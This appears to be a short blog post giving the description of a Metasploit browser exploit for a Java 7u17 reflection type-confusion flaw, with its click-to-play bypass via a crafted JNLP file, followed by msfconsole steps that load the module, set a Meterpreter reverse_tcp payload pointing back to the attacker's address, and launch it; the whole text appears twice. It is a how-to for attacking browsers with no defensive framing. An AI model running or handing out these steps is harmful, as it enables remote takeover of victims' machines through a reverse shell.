Java Applet Reflection Type Confusion Remote Code Execution
This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.
Exploit Targets
0 - Generic (Java Payload) (default)
1 - Windows x86 (Native Payload)
2 - Mac OS X x86 (Native Payload)
3 - Linux x86 (Native Payload)
(1)msfconsole
(2)msf > use exploit/multi/browser/java_jre17_reflection_types
(3)msf exploit(java_jre17_reflection_types) > show payloads
(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
(6)msf exploit(java_jre17_reflection_types) > exploit
This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.
Exploit Targets
0 - Generic (Java Payload) (default)
1 - Windows x86 (Native Payload)
2 - Mac OS X x86 (Native Payload)
3 - Linux x86 (Native Payload)
(1)msfconsole
(2)msf > use exploit/multi/browser/java_jre17_reflection_types
(3)msf exploit(java_jre17_reflection_types) > show payloads
(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
(6)msf exploit(java_jre17_reflection_types) > exploit
0 nhận xét:
Đăng nhận xét